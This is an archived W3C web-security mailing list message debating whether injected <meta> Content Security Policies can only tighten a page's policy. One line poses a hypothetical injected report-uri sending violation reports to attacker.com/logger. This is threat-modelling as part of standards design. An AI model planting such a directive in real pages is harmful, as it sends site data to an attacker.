I am not sure if a meta tag policy only constrains further. Joel started a related thread a while back [1], and I had mentioned a couple of examples where (it seemed to me) that an injected policy could add behavior instead of just constraining further [2]. Joel also mentioned that he was philosophically opposed to making CSP be "only allows you to constrain further"[3]. To mitigate this concern, should we try to limit what meta tag policies can do? For example, do we want to allow an injected policy to add a new report-uri to attacker.com/logger? Regards Dev [1] http://lists.w3.org/Archives/Public/public-webappsec/2014Mar/0001.html [2] http://lists.w3.org/Archives/Public/public-webappsec/2014Mar/0008.html [3] http://lists.w3.org/Archives/Public/public-webappsec/2014Mar/0020.html On 11 June 2014 09:00, Daniel Veditz <dveditz@mozilla.com> wrote: > On 6/11/2014 12:20 AM, Mike West wrote: > >> Thanks Dan. I agree with your analysis, and I appreciate you withdrawing >> your objection. >> >> I've made this change in >> https://github.com/w3c/webappsec/commit/f697c40eea84b6c57480c0e3783993 >> a47ebdc3d5 >> >> WDYT? >> > > To be clear, your change does two things and we were mainly talking about > the first: > * allows use of both HTTP and <meta> CSP > * allows use of multiple <meta> CSP > > The arguments against (and in favor of) multiple <meta> CSP are pretty > much the same as the arguments for and against allowing a combination of > header and <meta> policies. "It's useful, and why not since it can only > tighten policies" vs. "Injection bug in site might be used to circumvent a > feature whose main purpose assumes you need protection from injection > bugs". I'm not objecting to the change, just announcing my intention to sit > in the corner and fret about the possibility. > > -Dan Veditz > >Received on Wednesday, 11 June 2014 17:33:43 UTC
This archive was generated by hypermail 2.4.0 : Friday, 17 January 2020 18:54:39 UTC